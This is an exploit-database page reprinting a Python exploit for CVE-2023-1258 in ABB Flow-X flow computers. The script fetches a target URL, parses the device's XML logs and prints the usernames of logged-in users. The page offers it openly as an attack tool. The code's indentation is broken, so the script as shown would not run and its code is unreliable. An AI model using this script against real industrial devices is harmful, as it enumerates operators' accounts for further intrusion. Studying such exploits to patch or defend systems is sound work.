Advertisement






ABB FlowX v4.00 Exposure of Sensitive Information

CVE Category Price Severity
CVE-2023-1258 CWE-200 $500 High
Author Risk Exploitation Type Date
ExploitMaster High Remote 2023-07-21
CVSS
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023070052

Below is a copy:

ABB FlowX v4.00 Exposure of Sensitive Information
# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Date: 2023-03-31
# Exploit Author: Paul Smith
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258


#!/usr/bin/python
import sys
import re
from bs4 import BeautifulSoup as BS
import lxml
import requests

# Set the request parameter
url = sys.argv[1]


def dump_users():
    response = requests.get(url)

    # Check for HTTP codes other than 200
    if response.status_code != 200:
    print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)
    exit()

    # Decode the xml response into dictionary and use the data
    data = response.text
    soup = BS(data, features="xml")
    logs = soup.find_all("log")
    for log in logs:
    test = re.search('User (.*?) logged in',str(log))
    if test:
    print(test.group(0))
def main():
dump_users()


if __name__ == '__main__':
  main()

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.